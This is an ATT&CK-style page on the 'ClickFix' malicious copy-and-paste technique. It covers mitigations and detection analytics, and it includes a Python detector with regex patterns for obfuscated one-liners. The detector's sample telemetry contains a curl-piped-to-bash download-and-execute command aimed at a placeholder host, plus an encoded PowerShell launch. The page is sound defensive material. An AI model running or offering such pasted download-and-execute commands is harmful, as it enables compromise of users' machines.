User Execution: Malicious Copy and Paste

An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a Command and Scripting Interpreter. One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.

Malicious websites, such as those used in Drive-by Compromise, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.[1][2][3][4]

Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.[5][6]

Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.

ID: T1204.004
Sub-technique of: T1204
Tactic: Execution
Platforms: Linux, Windows, macOS
Contributors: Ale Houspanossian; Fernando Bacchin; Gabriel Currie; Harikrishnan Muthu, Cyble; Menachem Goldstein; ReliaQuest; SeungYoul Yoo, Ahn Lab
Version: 1.1
Created: 18 March 2025
Last Modified: 05 October 2025

Procedure Examples

ID Name Description
G1052 Contagious Interview

Contagious Interview has leveraged ClickFix type tactics enticing victims to copy and paste malicious code.[7][2][8]

S1229 Havoc

The Havoc infection chain has been initiated via ClickFix lures in phishing emails.[9]

Mitigations

ID Mitigation Description
M1038 Execution Prevention

Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., Add-Type).[10]

M1031 Network Intrusion Prevention

If a user requests a link, network intrusion prevention systems and systems that scan and remove malicious downloads can be used to block the activity.

M1021 Restrict Web-Based Content

If a user requests a link, block in transit, by default, unknown or unused file types that should not be downloaded (such as .scr, .exe, .pif, .cpl), or block downloads from suspicious sites by policy, as a best practice to prevent some of these vectors.

Detection Strategy

ID Name Analytic ID Analytic Description
DET0340 User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004

AN0962

A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.

AN0963

User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.

AN0964

User pastes an obfuscated command into Terminal.app/iTerm2 that decodes or downloads code and executes. Detects Terminal/iTerm2 spawning bash/zsh/python with suspicious pipeline/base64 patterns followed by file writes in ~/Library or /tmp and outbound network connections.
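The three analytics above (AN0962 for Windows, AN0963 for Linux, AN0964 for macOS) describe the same four-stage chain: a user-facing parent process, a command interpreter launched with obfuscation or download arguments, an optional file drop in a temporary location, and outbound egress, all correlated within a short window for one user session. The Python below is an added example written for this page, not MITRE's or any vendor's detection content. It runs that correlation over a few constructed telemetry records; the parent-process and interpreter lists, the argument regexes, the drop-path patterns and the 120-second window are assumptions chosen for the example, and the event field names are constructed and would need to be mapped onto real Sysmon, EDR, auditd or Endpoint Security telemetry.

```python
"""Correlate process, file and network events into the ClickFix-style chain of
AN0962/AN0963/AN0964. Example code for this page; field names, pattern lists and
sample events are constructed assumptions, not a product's detection logic."""
import re
from collections import defaultdict

# Stage 1, "user context": browsers, mail and office apps, the Windows shell
# (explorer.exe is the parent of commands typed into the Run dialog) and
# terminal emulators. Assumed list; extend for your environment.
USER_FACING_PARENTS = {
    "chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "winword.exe",
    "excel.exe", "explorer.exe",
    "terminal", "iterm2", "gnome-terminal", "konsole",
}
# Stage 2, interpreters named in the analytics.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "bash", "zsh", "sh", "python", "python3"}

# Argument patterns characteristic of pasted one-liners (assumed set).
ARG_PATTERNS = {
    "encoded_command": re.compile(r"(?i)(^|\s)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "invoke_expression": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "web_download": re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)"),
    "base64_decode": re.compile(r"(?i)(frombase64string|base64\s+(-d|--decode))"),
    "pipe_to_shell": re.compile(r"\|\s*(bash|sh|zsh|python3?|powershell|pwsh|iex)\b"),
}
# Stage 3, drop locations named in the analytics: %TEMP%, %APPDATA%, /tmp, ~/.cache, ~/Library.
DROP_PATH = re.compile(r"(?i)(\\temp\\|\\appdata\\|^/tmp/|/\.cache/|/library/)")


def interpreter_indicators(command_line):
    """Return the sorted names of ARG_PATTERNS that match a command line."""
    return sorted(name for name, rx in ARG_PATTERNS.items() if rx.search(command_line))


def _base(image):
    """Lower-cased file name of a Windows or POSIX image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def correlate(events, window=120):
    """Emit one alert per suspicious interpreter launch whose parent is user-facing,
    noting whether a temp-file drop and/or external egress followed within
    `window` seconds in the same (host, user, session)."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[(ev["host"], ev["user"], ev["session"])].append(ev)
    alerts = []
    for (host, user, _session), evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        for ev in evs:
            if ev["type"] != "process" or _base(ev["image"]) not in INTERPRETERS:
                continue
            if _base(ev["parent"]) not in USER_FACING_PARENTS:
                continue  # same command from a service/agent is not this chain
            indicators = interpreter_indicators(ev["cmdline"])
            if not indicators:
                continue
            later = [e for e in evs if ev["ts"] < e["ts"] <= ev["ts"] + window]
            drop = any(e["type"] == "file" and DROP_PATH.search(e["path"]) for e in later)
            egress = any(e["type"] == "network" and not e.get("internal", False) for e in later)
            alerts.append({
                "host": host, "user": user, "pid": ev["pid"],
                "parent": _base(ev["parent"]), "image": _base(ev["image"]),
                "indicators": indicators, "file_drop": drop, "egress": egress,
                "stages": 2 + drop + egress,          # stages 1 and 2 always present
                "severity": "high" if egress else "medium",
            })
    return alerts


# Constructed sample telemetry (not real logs). The base64 is just "AAAA..." encoded.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "ws01", "user": "alice", "session": 2, "type": "process", "pid": 4100,
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"ts": 103, "host": "ws01", "user": "alice", "session": 2, "type": "file",
     "path": r"C:\Users\alice\AppData\Local\Temp\upd.ps1"},
    {"ts": 105, "host": "ws01", "user": "alice", "session": 2, "type": "network",
     "dest": "cdn.example.invalid", "internal": False},
    # Same encoded command, but launched by a deployment agent: no user-facing parent.
    {"ts": 200, "host": "srv02", "user": "svc_deploy", "session": 0, "type": "process", "pid": 880,
     "parent": r"C:\Program Files\Deploy\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    # Linux terminal: download piped to bash, egress follows, no temp file observed.
    {"ts": 300, "host": "dev03", "user": "bob", "session": 7, "type": "process", "pid": 5120,
     "parent": "/usr/bin/gnome-terminal", "image": "/usr/bin/bash",
     "cmdline": 'bash -c "curl -fsSL http://example.invalid/run.sh | bash"'},
    {"ts": 301, "host": "dev03", "user": "bob", "session": 7, "type": "network",
     "dest": "example.invalid", "internal": False},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints two alerts: the Windows chain at all four stages (high) and the Linux chain with egress but no observed drop (high). The srv02 record carries the same encoded command yet produces nothing, because the stage-1 parent condition excludes launches by a service or agent; that condition is what keeps ordinary administrative automation from firing and is the first place to tune when onboarding the logic onto real telemetry.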

References